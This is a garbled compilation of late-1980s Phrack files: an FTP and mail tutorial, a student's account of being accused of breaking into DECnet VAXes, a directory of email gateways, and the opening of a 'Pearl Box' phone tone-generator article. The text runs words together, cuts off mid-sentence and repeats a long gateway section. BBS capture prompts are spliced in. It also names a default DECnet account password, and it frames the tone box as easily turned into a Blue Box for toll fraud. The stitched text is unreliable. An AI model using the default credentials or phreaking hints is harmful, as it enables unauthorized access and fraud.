There are a number of other subcommands in FTP that allow you to do manymorethings. Not all of these are standard so consult your local documentationortype a question mark at the FTP prompt. Some functions often built intoFTPinclude the ability to look at files before getting or putting them, theability to change directories, the ability to delete files on the remotecomputer, and the ability to list the directory on the remote host.
An intriguing capability of many FTP implementations is "third partytransfers." For example, if you are logged on computer A and you want tocausecomputer B to send a file to computer C, you can use FTP to connect tocomputerB and use the "rmtsend" command. Of course, you have to know usernames and
passwords on all three computers, since FTP never allows you to peek intosomeone's directory and files unless you know their username and password.
The "cd" subcommand changes your working directory on the remote host. The"lcd" subcommand changes the directory on the local host. For UNIXsystems,the meaning of these subcommands is obvious. Other systems, especiallythosethat do not have directory-structured file system, may not implement thesecommands or may implement them in a different manner.
The "dir" and "ls" subcommands do the same thing, namely list the files intheworking directory of of the remote host.
The "list" subcommand shows the contents of a file without actually puttingitinto a file on the local computer. This would be helpful if you justwanted toinspect a file. You could interrupt it before it reached the end of thefileby typing CONTROL-C or some other special character. This is dependent onyourFTP implementation.
The "delete" command can delete files on the remote host. You can alsomakeand remove directories on the remote host with "mkdir" and "rmdir". The"status" subcommand will tell you if you are connected and with whom andwhatthe state of all your options are.
If you are transferring binary files or files with any non-printablecharacters, turn binary mode on by entering the "binary" subcommand:
binary
To resume non-binary transfers, enter the "ascii" subcommand.
Transferring a number of files can be done easily by using "mput" (multipleput) and "mget" (multiple get). For example, to get every file in aparticulardirectory, first issue a "cd" command to change to that directory and thenan"mget" command with an asterisk to indicate every file:
cd somedirectorymget *
When you are done, use the "close" subcommand to break the communicationslink.You will still be in FTP, so you must use the "bye" subcommand to exit FTPandreturn to the command level. The "quit" subcommand will close theconnectionand exit from FTP at the same time.

Mail~~~~Mail is the simplest network facility to use in many ways. All you have todois to create your message, which can be done with a file editor or on thespurof the moment, and then send it. Unlike FTP and Telnet, you do not need toknow the password of the username on the remote computer. This is sobecauseyou cannot change or access the files of the remote user nor can you usetheiraccount to run programs. All you can do is to send a message.
There is probably a program on your local computer which does mail betweenusers on that computer. Such a program is called a mailer. This may ormaynot be the way to send or receive mail from other computers on the network,although integrated mailers are more and more common. UNIX mailers will beused as an example in this discussion.
Note that the protocol which is used to send and receive mail over a TCP/IPnetwork is called SMTP, the "Simple Mail Transfer Protocol." Typically,youwill not use any program called SMTP, but rather your local mail program.
UNIX mailers are usually used by invoking a program named "mail". Toreceivenew mail, simply type "mail".
There are several varieties of UNIX mailers in existence. Consult yourlocaldocumentation for details. For example, the command "man mail" prints outthemanual pages for the mail program on your computer.
To send mail, you usually specify the address of the recipient on the mailcommand. For example: "mail knight@umcvmb.missouri.edu" will send thefollowing message to username "knight" on host "umcvmb".
You can usually type in your message one line at a time, pressing RETURNaftereach line and typing CONTROL-D to end the message. Other facilities toincludealready-existing files sometimes exist. For example, Berkeley UNIXes allowyouto enter commands similar to the following to include a file in yourcurrentmail message:
r myfile
In this example, the contents of "myfile" are inserted into the message atthispoint.
Most UNIX systems allow you to send a file through the mail by using inputredirection. For example:
mail knight@umcvmb.missouri.edu < myfile
In this example, the contents of "myfile" are sent as a message to "knight"on"umcvmb."
Note that in many UNIX systems the only distinction between mail bound foranother user on the same computer and another user on a remote computer issimply the address specified. That is, there is no hostname for localrecipients. Otherwise, mail functions in exactly the same way. This iscommonfor integrated mail packages. The system knows whether to send the maillocally or through the network based on the address and the user isshieldedfrom any other details.
"The Quest For Knowledge Is Without End..."___________________________________________________________________________¼____
==Phrack Inc.==
Volume Three, Issue 27, File 7 of 12
<:><:><:><:><:><:><:><:><:><:><:><:><:><:><:><:> <:> <:> <:> The Making Of A Hacker <:> <:> <:> <:> by Framstag of West Germany <:> <:> <:> <:> June 2, 1989 <:> <:> <:> <:><:><:><:><:><:><:><:><:><:><:><:><:><:><:><:>
Prologue For None VMS Users~~~~~~~~~~~~~~~~~~~~~~~~~~~ DECnet is the network for DEC machines, in most cases you can sayVAXes.DECnet allows you to do: - e-mail - file transfer - remote login - remote command - remote job entry - PHONE PHONE is an interactive communication between users and is equal toTALKon UNIX or a "deluxe"-CHAT on VM/CMS.
BELWUE, the university network of the state Baden-Wuerttemberg inWest Germany contains (besides other networks) a DECnet with about 400VAXes.On every VAX there is standard-account called DECNET with pw:= DECNET,which isnot reachable via remote login. This account is provided for severalDECnet-Utilities and as a pseudo-guest-account. The DECNET-account has
veryrestricted privileges: You cannot edit a file or make another remotelogin.
The HELP-menu is equipped by the system and is similar to the MANcommandon UNIX.
More information on DECnet can be found in "Looking Around In DECnet"byDeep Thought in this very issue of Phrack Inc.- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -- -
Here, at the University of Ulm, we have an *incredibly* ignorantcomputercenter staff, with an even bigger lack of system-literature (besides the 80kgof VAX/VMS-manuals). The active may search for information by himself,whichis over the level of "run," "FORTRAN," or "logout." My good luck that Ihaveother accounts in the BELWUE-DECnet, where more information is offered fortheusers. I am a regular student in Ulm and all my accounts are completelylegaland corresponding to the German laws. I don't call myself a "hacker," Ifeelmore like a "user" (...it's more a defining-problem).
In the HELP-menu in a host in Tuebingen I found the file netdcl.comandthe corresponding explanation, which sends commands to the DECNET-Accountofother VAXes and executes them there (remote command). The explanation intheHELP-menu was idiot-proof -- therefore for me, too :-)
With the command "$ mcr ncp show known nodes" you can obtain a list ofallnetwide active VAXes, as is generally known, and so I pinged all theseVAXes tolook for more information for a knowledge-thirsty user. With "help", "dir"andother similar commands I look around on those DECnet accounts, alwayswatchingfor topics related to the BELWUE-network. It's a pity, that 2/3 of allVAXeshave locked the DECNET-Account for NETDCL.COM. Their system managers areprobably afraid of unauthorized access, but I cannot imagine how therecould besuch an unauthorized access, because you cannot log on this account -- nochance for trojan horses, etc.
Some system managers called me back after I visited their VAX to chatwithme about the network and asked me if they could help me in any way. Onesysop
from Stuttgart even sent me a version of NETDCL.COM for the ULTRIXoperationsystem.
Then, after a month, the H O R R O R came over me in shape of a thefollowing mail:
--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ------From: TUEBINGEN::SYSTEM 31-MAY-1989 15:31:11.38To: FRAMSTAGCC:Subj: don't make any crap, or you'll be kicked out!
From: ITTGPX::SYSTEM 29-MAY-1989 16:46To: TUEBINGEN::SYSTEMSubj: System-breaking-in 01-May-1989
To the system manager of the Computer TUEBINGEN,
On May 1st 1989 we had a System-breaking-in in our DECNET-account, whichstarted from your machine. By help of our accounting we ascertained youruserFRAMSTAG to have emulated an interactive log-on on our backbone-node and onevery machine of our VAX-cluster with the "trojan horse" NETDCL.COM. Giveusthis user's name and address and dear up the occurrence completely. Wepointout that the user is punishable. In case of repetition we would be forcedtotake corresponding measures. We will check whether our system got injured.Ifnot, this time we will disregard any measure. Inform us via DECnet aboutyourinvestigation results -- we are attainable by the nodenumber 1084::system
Dipl.-Ing. Michael Hager--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ------
My system manager threatened me with the deleting of my account, if Iwould not immediately enlighten the affair. *Gulp*! I was conscious about my innocence, but how to tell it to the others?Iexplained, step by step, everything to my system manager. He thenunderstoodafter a while, but the criminal procedure still hovered over me... so, Itookquickly to my keyboard, to compose file of explanations and to send it tothatangry system manager in Stuttgart (node 1084 is an institute there). Butnoway out: He had run out of disk quota and my explanation-mail sailed intothenirwana:
--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ------
$ mail explanation To: 1084::system%MAIL-E, error sending to user SYSTEM at 1084%MAIL-E-OPENOUT, error openingSYS$SYSROOT:[SYSMGR]MAIL$00040092594FD194.MAI;as output-RMS-E-CRE, ACP file create failed-SYSTEM-F-EXDISKQUOTA, disk quota exceeded--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ------
Also the attempt of a connection with the PHONE-facilty failed: Inhisborderless hacker-paranoia, he cut off his PHONE... and nowhere is a listwiththe REAL-addresses of the virtual DECnet-addresses available (to preventhacking). Now I stood there with the brand "DANGEROUS HACKER!" and I hadnochance to vindicate myself. I poured out my troubles to an acquaintance ofmine, who is a sysop in the computer-center in Freiburg. He asked othersysopsand managers thru the whole BELWUE-network until someone gave him atelephonenumber after a few days -- and that was the right one!
I phoned to this Hager and told him what I had done with hisDECnet-account and also what NOT. I wanted to know which crime I hadcommitted. He promptly cancelled all of his reproaches, but he did notexcusehis defamous incriminations. I entreated him to inform my system managerinTuebingen that I have done nothing illegal and to stop him from erasing myaccount. This happens already to a fellow student of mine (in this case,Hagerwas also guilty). He promised me that he would officially cancel hisreproaches.
After over a week this doesn't happen (I'm allowed to use my accountfurther on). In return for it, I received a new mail from Hager on anotheraccount of mine:
--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ------From: 1084::HAGER 1-JUN-1989 12:51To: 50180::STUD_11Subj: System-breaking-in
On June 1st 1989 you have committed a system-breaking-in on at least one ofourVAXes. We were able to register this occurrence. We would be forced totakefurther measure if you did not dear up the occurrence completely until June6th.
Of course the expenses involved would be imposed on you. Henceenlightenmentmust be in your own interest.
We are attainable via DECnet-mail with the address 1084::HAGER or viafollowingaddress:
Institut fuer Technische Thermodynamik und Thermische VerfahrenstechnikDipl.-Ing. M. Hager Tel.: 0711/685-6109Dipl.-Ing. M. Mrzyglod Tel.: 0711/685-3398Pfaffenwaldring 9/10-17000 Stuttgart-80
M. Hager M. Mrzyglod--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ------
This was the reaction of my attempt: "$ PHONE 1084::SYSTEM". I have notanswered to this mail. I AM SICK OF IT!
Framstag (FRAMSTAG@DTUPEV5A.BITNET)
With Special Thanks For Translation Assistance To Schrulli B.___________________________________________________________________________¼____

==Phrack Inc.==
Volume Three, Issue 28, File #4 of 12
Network Miscellany ~~~~~~~~~~~~~~~~~~ by Taran King
June 1, 1989
ACSNET~~~~~~Australian Computer Science Network (ACSNET), also known as Oz, has itsgatewaythrough the CSNET node munnari.oz.au and if you cannot directly mail to theoz.au domain, try either username%munnari.oz.au@UUNET.UU.NET ormunnari!username@UUNET.UU.NET.
AT&T MAIL~~~~~~~~~AT&T Mail is a mailing service of AT&T, probably what you might call it'sMCI-Mail equivalent. It is available on the UUCP network as node nameattmailbut I've had problems having mail get through. Apparently, it does costmoneyto mail to this service and the surrounding nodes are not willing to pickupthe tab for the ingoing mail, or at least, this has seemingly been the casethus far. I believe, though, that perhaps routing to att!attmail!user
wouldwork.
AT&T recently announced six new X.400 interconnections between AT&T Mailandelectronic mail services in the U.S., Korea, Sweden, Australia, andFinland.In the U.S., AT&T Mail is now interconnected with Telenet CommunicationsCorporation's service, Telemail, allowing users of both services toexchangemessages easily. With the addition of these interconnections, the AT&TMailGateway 400 Service allows AT&T Mail subscribers to exchange messages withusers of the following electronic messaging systems:
Company E-Mail Name* Country------- ------------ -------TeleDelta TeDe 400 SwedenOTC MPS400 AustraliaTelecom-Canada Envoy100 CanadaDACOM DACOM MHS KoreaP&T-Tele MailNet 400 FinlandHelsinki Telephone Co. ELISA FinlandDialcom Dialcom USATelenet Telemail USAKDD Messavia JapanTranspac ATLAS400 France
The interconnections are based on the X.400 standard, a set of guidelinesforthe format, delivery and receipt of electronic messages recommended by aninternational standards committee the CCITT. International X.400 messagesincur a surcharge. They are:
To Canada: Per note: $.05 Per message unit: $.10
To other international locations: Per note: $.20 Per message unit: $.50
There is no surcharge for X.400 messages within the U.S. The following arecontacts to speak with about mailing through these mentioned networks.Otherquestions can be directed through AT&T Mail's toll-free number,1-800-624-5672.
MHS Gateway: mhs!atlas MHS Gateway: mhs!dacomAdministrator: Bernard Tardieu Administrator: Bob NicholsonTranspac AT&TPhone: 3399283203 Morristown, NJ 07960Phone: +1 201 644 1838
MHS Gateway: mhs!dialcom MHS Gateway: mhs!elisaAdministrator: Mr. Laraman Administrator: UllaKarajalainenDialcom Nokia Data
South Plainfield, NJ 07080 Phone: 01135804371Phone: +1 441 493 3843
MHS Gateway: mhs!envoy MHS Gateway: mhs!kddAdministrator: Kin C. Ma Administrator: Shigeo LwaseTelecom Canada Kokusai Denshin Denwa CO.Phone: +1 613 567 7584 Phone: 8133477419
MHS Gateway: mhs!mailnet MHS Gateway: mhs!otcAdministrator: Kari Aakala Administrator: Gary W.KrumbineGen Directorate Of Post & AT&T Information SystemsPhone: 35806921730 Lincroft, NJ 07738 Phone: +1 201 576 2658
MHS Gateway: mhs!telemail MHS Gateway: mhsAdministrator: Jim Kelsay Administrator: AT&T Mail MHSGTE Telenet Comm Corp GatewayReston, VA 22096 AT&TPhone: +1 703 689 6034 Lincroft, NJ 08838 Phone: +1 800 624 5672
CMR~~~Previously known as Intermail, the Commercial Mail Relay (CMR) Service is amail relay service between the Internet and three commercial electronicmailsystems: US Sprint/Telenet, MCI-Mail, and DIALCOM systems (i.e. Compmail,NSFMAIL, and USDA-MAIL).
An important note: The only requirement for using this mail gateway isthatthe work conducted must be DARPA sponsored research and other approvedgovernment business. Basically, this means that unless you've got somegovernment-related business, you're not supposed to be using this gateway.Regardless, it would be very difficult for them to screen everything thatgoesthrough their gateway. Before I understood the requirements of thisgateway, Iwas sending to a user of MCI-Mail and was not contacted about any problemswiththat communication. Unfortunately, I mistyped the MCI-Mail address on oneofthe letters and that letter ended up getting read by system administratorswhothen informed me that I was not to be using that system, as well as thefactthat they would like to bill me for using it. That was an interestingthoughton their part anyway, but do note that using this service does incurcharges.
The CMR mailbox address in each system corresponds to the label:
Telemail: [Intermail/USCISI]TELEMAIL/USA MCI-Mail: Intermail or 107-8239 CompMail: Intermail or CMP0817 NSF-Mail: Intermail or NSF153
USDA-Mail: Intermail or AGS9999
Addressing examples for each e-mail system are as follows:
MCIMAIL: 123-4567 seven digit address Everett T. Bowens person's name (must be unique!)
COMPMAIL: CMP0123 three letters followed by three or four digits S.Cooper initial, then "." and then last name 134:CMP0123 domain, then ":" and then combination system and account number
NSFMAIL: NSF0123 three letters followed by three or four digits A.Phillips initial, then "." and then last name 157:NSF0123 domain, then ":" and then combination system and account number
USDAMAIL: AGS0123 three letters followed by three or four digits P.Shifter initial, then "." and then last name 157:AGS0123 domain, then ":" and then combination system and account number
TELEMAIL: BARNOC user (directly on Telemail) BARNOC/LODH user/organization (directly on Telemail) [BARNOC/LODH]TELEMAIL/USA [user/organization]system branch/country
The following are other Telenet system branches/countries that can bemailedto:
TELEMAIL/USA NASAMAIL/USA MAIL/USA TELEMEMO/AUSTRALIATELECOM/CANADA TOMMAIL/CHILE TMAILUK/GB ITALMAIL/ITALYATI/JAPAN PIPMAIL/ROC DGC/USA FAAMAIL/USAGSFC/USA GTEMAIL/USA TM11/USA TNET.TELEMAIL/USAUSDA/USA
Note: OMNET's ScienceNet is on the Telenet system MAIL/USA and tomail toit, the format would be [A.MAILBOX/OMNET]MAIL/USA. The following areavailablesubdivisions of OMNET:
AIR Atmospheric Sciences EARTH Solid Earth Sciences LIFE Life Sciences OCEAN Ocean Sciences POLAR Interdisciplinary Polar Studies SPACE Space Science and Remote Sensing
The following is a list of DIALCOM systems available in the listedcountrieswith their domain and system numbers:

Service Name Country Domain Number System Number~~~~~~~~~~~~ ~~~~~~~ ~~~~~~~~~~~~~ ~~~~~~~~~~~~~Keylink-Dialcom Australia 60 07, 08, 09Dialcom Canada 20 20, 21, 22,23, 24DPT Databoks Denmark 124 71Telebox Finland 127 62Telebox West Germany 30 15, 16Dialcom Hong Kong 80 88, 89Eirmail Ireland 100 74Goldnet Israel 50 05, 06Mastermail Italy 130 65, 67Mastermail Italy 1 66, 68Dialcom Japan 70 13, 14Dialcom Korea 1 52Telecom Gold Malta 100 75Dialcom Mexico 1 52Memocom Netherlands 124 27, 28, 29Memocom Netherlands 1 55Starnet New Zealand 64 01, 02Dialcom Puerto Rico 58 25Telebox Singapore 88 10, 11, 12Dialcom Taiwan 1 52Telecom Gold United Kingdom 100 01, 04, 17,80-89DIALCOM USA 1 29, 30, 31,32, 33, 34, 37,38, 41-59, 61, 62,63, 90-99
NOTE: You can also mail to username@NASAMAIL.NASA.GOV or username@GSFCMAIL.NASA.GOV instead of going through the CMR gatewayto mail to NASAMAIL or GSFCMAIL.
For more information and instructions on how to use CMR, send a message totheuser support group at intermail-request@intermail.isi.edu (you'll getbasicallywhat I've listed plus maybe a bit more). Please read Chapter 3 of TheFutureTranscendent Saga (Limbo to Infinity) for specifics on mailing to thesedestination mailing systems.
COMPUSERVE~~~~~~~~~~CompuServe is well known for its games and conferences. It does, though,havemailing capability. Now, they have developed their own Internet domain,calledCOMPUSERVE.COM. It is relatively new and mail can be routed through eitherTUT.CIS.OHIO-STATE.EDU or NORTHWESTERN.ARPA.
Example: user%COMPUSERVE.COM@TUT.CIS.OHIO-STATE.EDU or replace
TUT.CIS.OHIO-STATE.EDU with NORTHWESTERN.ARPA).
The CompuServe link appears to be a polled UUCP connection at the gatewaymachine. It is actually managed via a set of shell scripts and a commutilitycalled xcomm, which operates via command scripts built on the fly by theshellscripts during analysis of what jobs exist to go into and out ofCompuServe.
CompuServe subscriber accounts of the form 7xxxx,yyyy can be addressed as7xxxx.yyyy@compuserve.com. CompuServe employees can be addressed by theirusernames in the csi.compuserve.com subdomain. CIS subscribers write mailto">inet:user@host.domain" to mail to users on the Wide-Area Networks, where">gateway:" is CompuServe's internal gateway access syntax. The gatewaygenerates fully-RFC-compliant headers.
To fully extrapolate -- from the CompuServe side, you would use theirEasyPlexmail system to send mail to someone in BITNET or the Internet. Forexample,to send me mail at my Bitnet id, you would address it to:
INET:C488869%UMCVMB.BITNET@CUNYVM.CUNY.EDU
Or to my Internet id:
INET:C488869@UMCVMB.MISSOURI.EDU
Now, if you have a BITNET to Internet userid, this is a silly thing to do,since your connect time to CompuServe costs you money. However, you canusethis information to let people on CompuServe contact YOU. CompuServeCustomerService says that there is no charge to either receive or send a message totheInternet or BITNET.
DASNET~~~~~~DASnet is a smaller network that connects to the Wide-Area Networks butchargesfor their service. DASnet subscribers get charged for both mail to usersonother networks AND mail for them from users of other networks. Thefollowingis a brief description of DASnet, some of which was taken from theirpromotional text letter.
DASnet allows you to exchange electronic mail with people on more than 20systems and networks that are interconnected with DASnet. One of thedrawbacks, though, is that, after being subscribed to these services, youmustthen subscribe to DASnet, which is a separate cost. Members of Wide-Areanetworks can subscribe to DASnet too. Some of the networks and systemsreachable through DASnet include the following:
ABA/net, ATT Mail, BIX (Byte Information eXchange), DASnet Network, Dialcom, EIES, EasyLink, Envoy 100, FAX, GeoMail, INET, MCI Mail, NWI, PeaceNet/EcoNet, Portal Communications, The Meta Network, The Source, Telemail, ATI's Telemail (Japan), Telex, TWICS (Japan), UNISON, UUCP,The WELL, and Domains (i.e. ".COM" and ".EDU" etc.). New systems areadded all of the time. As of the writing of this file, Connect, GoverNET, MacNET, and The American Institute of Physics PI-MAIL are soon to be connected.
You can get various accounts on DASnet including:
o Corporate Accounts -- If your organization wants more than oneindividual subscription. o Site Subscriptions -- If you want DASnet to link directly to your organization's electronic mail system.
To send e-mail through DASnet, you send the message to the DASnet accountonyour home system. You receive e-mail at your mailbox, as you do now. OntheWide-Area Networks, you send mail to XB.DAS@STANFORD.BITNET. On theSubject:line, you type the DASnet address in brackets and then the username justoutside of them. The real subject can be expressed after the usernameseparated by a "!" (Example: Subject: [0756TK]randy!How's Phrack?).
The only disadvantage of using DASnet as opposed to Wide-Area networks isthecost. Subscription costs as of 3/3/89 cost $4.75 per month or $5.75 permonthfor hosts that are outside of the U.S.A.
You are also charged for each message that you send. If you arecorrespondingwith someone who is not a DASnet subscriber, THEIR MAIL TO YOU is billed toyour account.
The following is an abbreviated cost list for mailing to the differentservicesof DASnet:
PARTIAL List DASnet Cost DASnet Cost of Services 1st 1000 Each Add'l 1000 Linked by DASnet (e-mail) Characters Characters:
INET, MacNET, PeaceNet, NOTE: 20 lines Unison, UUCP*, Domains, .21 .11 of text is app. e.g. .COM, .EDU* 1000 characters.
Dialcom--Any "host" in U.S. .36 .25
Dialcom--Hosts outside U.S. .93 .83
EasyLink (From EasyLink) .21 .11 (To EasyLink) .55 .23

U.S. FAX (internat'l avail.) .79 .37
GeoMail--Any "host" in U.S. .21 .11 GeoMail--Hosts outside U.S. .74 .63
MCI (from MCI) .21 .11 (to MCI) .78 .25 (Paper mail - USA) 2.31 .21
Telemail .36 .25
W.U. Telex--United States 1.79 1.63 (You can also send Telexes outside the U.S.)
TWICS--Japan .89 .47
* The charges given here are to the gateway to the network. The DASnet user is not charged for transmission on the network itself.
Subscribers to DASnet get a free DASnet Network Directory as well as alistingin the directory, and the ability to order optional DASnet services likeauto-porting or DASnet Telex Service which gives you your own Telex numberandanswerback for $8.40 a month at this time.
DASnet is a registered trademark of DA Systems, Inc.
DA Systems, Inc. 1503 E. Campbell Ave. Campbell, CA 95008 408-559-7434 TELEX: 910 380-3530
The following two sections on PeaceNet and AppleLink are in associationwithDASnet as this network is what is used to connect00 FinlandHelsinki Telephone Co. ELISA FinlandDialcom Dialcom USATelenet Telemail USAKDD Messavia JapanTranspac ATLAS400 France
The interconnections are based on the X.400 standard, a set of guidelinesforthe format, delivery and receipt of electronic messages recommended by aninternational standards committee the CCITT. International X.400 messagesincur a surcharge. They are:
To Canada: Per note: $.05 Per message unit: $.10
To other international locations: Per note: $.20 Per message unit: $.50
There is no surcharge for X.400 messages within the U.S. The following arecontacts to speak with about mailing through these mentioned networks.Otherquestions can be directed through AT&T Mail's toll-free number,1-800-624-5672.
MHS Gateway: mhs!atlas MHS Gateway: mhs!dacomAdministrator: Bernard Tardieu Administrator: Bob NicholsonTranspac AT&TPhone: 3399283203 Morristown, NJ 07960Phone: +1 201 644 1838
MHS Gateway: mhs!dialcom MHS Gateway: mhs!elisaAdministrator: Mr. Laraman Administrator: UllaKarajalainenDialcom Nokia DataSouth Plainfield, NJ 07080 Phone: 01135804371Phone: +1 441 493 3843
MHS Gateway: mhs!envoy MHS Gateway: mhs!kddAdministrator: Kin C. Ma Administrator: Shigeo LwaseTelecom Canada Kokusai Denshin Denwa CO.Phone: +1 613 567 7584 Phone: 8133477419
MHS Gateway: mhs!mailnet MHS Gateway: mhs!otcAdministrator: Kari Aakala Administrator: Gary W.KrumbineGen Directorate Of Post & AT&T Information SystemsPhone: 35806921730 Lincroft, NJ 07738 Phone: +1 201 576 2658
MHS Gateway: mhs!telemail MHS Gateway: mhsAdministrator: Jim Kelsay Administrator: AT&T Mail MHSGTE Telenet Comm Corp GatewayReston, VA 22096 AT&TPhone: +1 703 689 6034 Lincroft, NJ 08838 Phone: +1 800 624 5672
CMR~~~Previously known as Intermail, the Commercial Mail Relay (CMR) Service is amail relay service between the Internet and three commercial electronicmailsystems: US Sprint/Telenet, MCI-Mail, and DIALCOM systems (i.e. Compmail,NSFMAIL, and USDA-MAIL).
An important note: The only requirement for using this mail gateway isthatthe work conducted must be DARPA sponsored research and other approvedgovernment business. Basically, this means that unless you've got somegovernment-related business, you're not supposed to be using this gateway.Regardless, it would be very difficult for them to screen everything thatgoesthrough their gateway. Before I understood the requirements of thisgateway, Iwas sending to a user of MCI-Mail and was not contacted about any problemswiththat communication. Unfortunately, I mistyped the MCI-Mail address on one
ofthe letters and that letter ended up getting read by system administratorswhothen informed me that I was not to be using that system, as well as thefactthat they would like to bill me for using it. That was an interestingthoughton their part anyway, but do note that using this service does incurcharges.
The CMR mailbox address in each system corresponds to the label:
Telemail: [Intermail/USCISI]TELEMAIL/USA MCI-Mail: Intermail or 107-8239 CompMail: Intermail or CMP0817 NSF-Mail: Intermail or NSF153 USDA-Mail: Intermail or AGS9999
Addressing examples for each e-mail system are as follows:
MCIMAIL: 123-4567 seven digit address Everett T. Bowens person's name (must be unique!)
COMPMAIL: CMP0123 three letters followed by three or four digits S.Cooper initial, then "." and then last name 134:CMP0123 domain, then ":" and then combination system and account number
NSFMAIL: NSF0123 three letters followed by three or four digits A.Phillips initial, then "." and then last name 157:NSF0123 domain, then ":" and then combination system and account number
USDAMAIL: AGS0123 three letters followed by three or four digits P.Shifter initial, then "." and then last name 157:AGS0123 domain, then ":" and then combination system and account number
TELEMAIL: BARNOC user (directly on Telemail) BARNOC/LODH user/organization (directly on Telemail) [BARNOC/LODH]TELEMAIL/USA [user/organization]system branch/country
The following are other Telenet system branches/countries that can bemailedto:
TELEMAIL/USA NASAMAIL/USA MAIL/USA TELEMEMO/AUSTRALIATELECOM/CANADA TOMMAIL/CHILE TMAILUK/GB ITALMAIL/ITALYATI/JAPAN PIPMAIL/ROC DGC/USA FAAMAIL/USAGSFC/USA GTEMAIL/USA TM11/USA TNET.TELEMAIL/USAUSDA/USA
Note: OMNET's ScienceNet is on the Telenet system MAIL/USA and tomail toit, the format would be [A.MAILBOX/OMNET]MAIL/USA. The following areavailablesubdivisions of OMNET:
AIR Atmospheric Sciences EARTH Solid Earth Sciences LIFE Life Sciences OCEAN Ocean Sciences POLAR Interdisciplinary Polar Studies SPACE Space Science and Remote Sensing
The following is a list of DIALCOM systems available in the listedcountrieswith their domain and system numbers:
Service Name Country Domain Number System Number~~~~~~~~~~~~ ~~~~~~~ ~~~~~~~~~~~~~ ~~~~~~~~~~~~~Keylink-Dialcom Australia 60 07, 08, 09Dialcom Canada 20 20, 21, 22,23, 24DPT Databoks Denmark 124 71Telebox Finland 127 62Telebox West Germany 30 15, 16Dialcom Hong Kong 80 88, 89Eirmail Ireland 100 74Goldnet Israel 50 05, 06Mastermail Italy 130 65, 67Mastermail Italy 1 66, 68Dialcom Japan 70 13, 14Dialcom Korea 1 52Telecom Gold Malta 100 75Dialcom Mexico 1 52Memocom Netherlands 124 27, 28, 29Memocom Netherlands 1 55Starnet New Zealand 64 01, 02Dialcom Puerto Rico 58 25Telebox Singapore 88 10, 11, 12Dialcom Taiwan 1 52Telecom Gold United Kingdom 100 01, 04, 17,80-89DIALCOM USA 1 29, 30, 31,32, 33, 34, 37,38, 41-59, 61, 62,63, 90-99
NOTE: You can also mail to username@NASAMAIL.NASA.GOV or username@GSFCMAIL.NASA.GOV instead of going through the CMR gatewayto mail to NASAMAIL or GSFCMAIL.
For more information and instructions on how to use CMR, send a message totheuser support group at intermail-request@intermail.isi.edu (you'll get
basicallywhat I've listed plus maybe a bit more). Please read Chapter 3 of TheFutureTranscendent Saga (Limbo to Infinity) for specifics on mailing to thesedestination mailing systems.
COMPUSERVE~~~~~~~~~~CompuServe is well known for its games and conferences. It does, though,havemailing capability. Now, they have developed their own Internet domain,calledCOMPUSERVE.COM. It is relatively new and mail can be routed through eitherTUT.CIS.OHIO-STATE.EDU or NORTHWESTERN.ARPA.
Example: user%COMPUSERVE.COM@TUT.CIS.OHIO-STATE.EDU or replace TUT.CIS.OHIO-STATE.EDU with NORTHWESTERN.ARPA).
The CompuServe link appears to be a polled UUCP connection at the gatewaymachine. It is actually managed via a set of shell scripts and a commutilitycalled xcomm, which operates via command scripts built on the fly by theshellscripts during analysis of what jobs exist to go into and out ofCompuServe.
CompuServe subscriber accounts of the form 7xxxx,yyyy can be addressed as7xxxx.yyyy@compuserve.com. CompuServe employees can be addressed by theirusernames in the csi.compuserve.com subdomain. CIS subscribers write mailto">inet:user@host.domain" to mail to users on the Wide-Area Networks, where">gateway:" is CompuServe's internal gateway access syntax. The gatewaygenerates fully-RFC-compliant headers.
To fully extrapolate -- from the CompuServe side, you would use theirEasyPlexmail system to send mail to someone in BITNET or the Internet. Forexample,to send me mail at my Bitnet id, you would address it to:
INET:C488869%UMCVMB.BITNET@CUNYVM.CUNY.EDU
Or to my Internet id:
INET:C488869@UMCVMB.MISSOURI.EDU
Now, if you have a BITNET to Internet userid, this is a silly thing to do,since your connect time to CompuServe costs you money. However, you canusethis information to let people on CompuServe contact YOU. CompuServeCustomerService says that there is no charge to either receive or send a message totheInternet or BITNET.
DASNET~~~~~~DASnet is a smaller network that connects to the Wide-Area Networks but
chargesfor their service. DASnet subscribers get charged for both mail to usersonother networks AND mail for them from users of other networks. Thefollowingis a brief description of DASnet, some of which was taken from theirpromotional text letter.
DASnet allows you to exchange electronic mail with people on more than 20systems and networks that are interconnected with DASnet. One of thedrawbacks, though, is that, after being subscribed to these services, youmustthen subscribe to DASnet, which is a separate cost. Members of Wide-Areanetworks can subscribe to DASnet too. Some of the networks and systemsreachable through DASnet include the following:
ABA/net, ATT Mail, BIX (Byte Information eXchange), DASnet Network, Dialcom, EIES, EasyLink, Envoy 100, FAX, GeoMail, INET, MCI Mail, NWI, PeaceNet/EcoNet, Portal Communications, The Meta Network, The Source, Telemail, ATI's Telemail (Japan), Telex, TWICS (Japan), UNISON, UUCP,The WELL, and Domains (i.e. ".COM" and ".EDU" etc.). New systems areadded all of the time. As of the writing of this file, Connect, GoverNET, MacNET, and The American Institute of Physics PI-MAIL are soon to be connected.
You can get various accounts on DASnet including:
o Corporate Accounts -- If your organization wants more than oneindividual subscription. o Site Subscriptions -- If you want DASnet to link directly to your SAGE **#EOI

[M] PHRACK: Type
Enter Filename :
[M] PHRACK: Type
Enter Filename :
[M] PHRACK: Type
Enter Filename :
[M] PHRACK: Type
Enter Filename :
[M] PHRACK: Type
Enter Filename :
[M] PHRACK: Type
Enter Filename :
[M] PHRACK: Type
Enter Filename :
[M] PHRACK: Type
Enter Filename :
[M] PHRACK: Type
Enter Filename :
==Phrack Inc.==
Volume Three, Issue 28, File #5 of 12
/////////////////////\\\\\\\\\\\\\\\\\\\\\ A Real Functioning PEARL BOX Schematic Written, Tested, and Used by Dispater July 1, 1989 \\\\\\\\\\\\\\\\\\\\\/////////////////////
Introduction: After reading the earlier renditions of schematics for thePearl Box, I decided that there was an easier and cheaper way ofdoing the same thing with an IC and parts you probably have just laying around the house.
What Is A Pearl Box and Why Do I Want One?
A Pearl Box is a tone generating device that is used to make a widerange of single tones. Therefore, it would be very easy to modify thisbasic design to make a Blue Box by making 2 Pearl Boxes and joining them together in some fashion.
